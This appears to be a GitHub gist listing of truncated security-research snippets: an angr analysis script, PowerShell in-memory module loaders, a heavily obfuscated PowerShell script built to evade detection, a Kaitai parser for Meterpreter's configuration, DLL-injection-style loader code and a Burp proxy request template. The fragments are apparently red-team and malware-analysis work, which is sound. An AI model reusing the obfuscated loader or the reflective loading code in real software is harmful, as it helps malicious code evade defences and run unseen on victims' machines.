plowsec / symbolic_init_state.py
Created June 26, 2019 07:28
Attempt to dump symbolic constraints on registers after executing a few select instructions.
from angr import options
import angr
# Addresses inside the analysed binary. addr_main is where the block below is
# fetched from; the two addr_end_* values are, by their names, presumably the
# stop points after which register constraints are dumped — confirm against
# the rest of the script, which is not shown here.
addr_main = 0x08049574
addr_end_alu_eq = 0x08049657
addr_end_load_jmp_regs = 0x08049731
# Load only the binary itself: auto_load_libs=False keeps shared libraries
# out of the project so the analysis is limited to the binary's own code.
proj = angr.Project("bin/test_mov_strip.bin", auto_load_libs=False)
main = proj.factory.block(addr_main) # unused
plowsec / pwrup.ps1
Created July 8, 2019 14:29
pwrup.ps1
function conglomerated
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
$XFJbzEkH99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
plowsec / pwrups.ps1
Last active July 9, 2019 08:11
Test
${U`H`TiV}=[tYPE]("{0}{1}" -F'gUI','D'); &("{1}{0}"-f 'T','SE') ("6"+"Lox"+"fI") ( [TYpE]("{1}{0}{5}{3}{2}{4}" -F'LECT','REf','AsSemB','n.','ly','Io') ) ; ${xsW`yuo}=[tyPE]("{6}{1}{0}{4}{2}{3}{5}{7}" -F'.INt','IMe','oPSEr','vicES.','Er','CAllinG','RUnt','CONvENtioN') ; ${5q`6x9} = [TyPE]("{5}{3}{0}{7}{2}{4}{1}{6}"-F 'ErViCE','Rse','.','UNtime.iNTeROPS','CHA','r','T','s') ; &("{0}{3}{1}{2}" -f 'S','ArIA','BLE','et-v') ("LR1u"+"sm") ( [TypE]("{10}{2}{7}{9}{4}{5}{8}{0}{6}{1}{3}" -F'viCEs.DLLiMpORTat','iB','ime.IN','uTe','oPS','e','tr','TE','r','R','runT')) ; &('Sv') ("{0}{1}" -f '0pl','8') ( [TYpE]("{3}{1}{0}{2}"-f'r','lagsATt','IbUTe','F') ); &('sv') ("{1}{0}"-f'E','wCB') ([TyPE]("{1}{4}{0}{3}{2}{5}"-f 'CtIOn.em','R','.PaCkinGsiZ','It','EflE','e')); &("{0}{1}{2}"-f'set','-It','EM') ('Va'+'rIAb'+'LE:'+'wG5'+'r') ( [tYpe]("{5}{6}{7}{1}{4}{0}{3}{2}" -f'TtR','tI','bUtEs','I','On.tyPeA','rE','fl','EC')); &("{2}{1}{0}" -f'LE','eT-varIAB','s') ("{1}{0}"-f 'M','C1j') ( [tyPE]("{0}{4}{5}{1}{7}{3}{2}{
plowsec / toto2.ps1
Created July 9, 2019 09:31
adadasdadasdada
function New-InMemoryModule
{
<#
.SYNOPSIS
.DESCRIPTION
plowsec / pwrups_v2
Created August 26, 2019 15:31
pwrup_v2
Add-Type @"
[System.FlagsAttribute]
public enum ServiceAccessFlags : uint
{
CC = 1,
DC = 2,
LC = 4,
SW = 8,
RP = 16,
WP = 32,
plowsec / metsrv_config.ksy
Last active May 26, 2020 12:04
Kaitai struct for MetsrvConfig
meta:
id: mtp
file-extension: mtp
seq:
- id: handle
size: 8
- id: exit_func
type: u4le
- id: expiry
type: s4le
#include <stdio.h>
#include <windows.h>
int main()
{
HRESULT hResult;
HMODULE hModule = LoadLibraryA("test.dll");
if (hModule == NULL) {
printf("meeeeh\n");
plowsec / dllmain.c
Created May 26, 2020 12:06
Quick and dirty DLL main
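/*
 * Work routine started from DllMain; it only calls toto(), which is
 * defined elsewhere in the project.
 *
 * Declared with an explicit (void) parameter list so that calls are checked
 * against a real prototype: in pre-C23 C an empty () list leaves the
 * arguments unchecked.
 *
 * NOTE(review): DllMain hands this function to CreateThread through a cast
 * to LPTHREAD_START_ROUTINE, whose contract is DWORD WINAPI fn(LPVOID).
 * This signature does not match that contract (return type, calling
 * convention and parameter differ), so calling it through the cast is
 * undefined behaviour; a thread-start wrapper with the proper signature
 * would remove the cast. Confirm before relying on the current shape.
 */
void main_dll(void) {
    toto();
}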
BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
if (reason != DLL_PROCESS_ATTACH)
return TRUE;
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main_dll, NULL, 0, NULL);
plowsec / readfile.cpp
Created May 26, 2020 12:07
Read a file with the Win32 API
void read_file(char* path, PBYTE buffer, size_t bufsize, DWORD* size_read) {
HANDLE hFile;
hFile = CreateFileA(path, // file to open
GENERIC_READ, // open for reading
FILE_SHARE_READ, // share for reading
NULL, // default security
OPEN_EXISTING, // existing file only
FILE_ATTRIBUTE_NORMAL, // normal file
import requests
from lxml import html
# Request template (the burp0_* naming matches an export from an intercepting
# proxy tool); URL, cookies and headers are empty here and presumably filled in
# further down the script, which is not shown — verify.
burp0_url = ""
burp0_cookies = {}
burp0_headers = {}
# Local intercepting proxy listener that the requests are routed through.
g_proxy = "127.0.0.1:8080"
http_proxy = f"http://{g_proxy}"
# NOTE(review): a proxy URL with an https:// scheme makes requests open a TLS
# connection to the proxy itself, not only to the target. A local intercepting
# proxy listener is normally plain HTTP, so f"http://{g_proxy}" is probably
# what was intended for HTTPS traffic as well — confirm against the listener
# configuration. The same question applies to the ftp:// scheme below.
https_proxy = f"https://{g_proxy}"
ftp_proxy = f"ftp://{g_proxy}"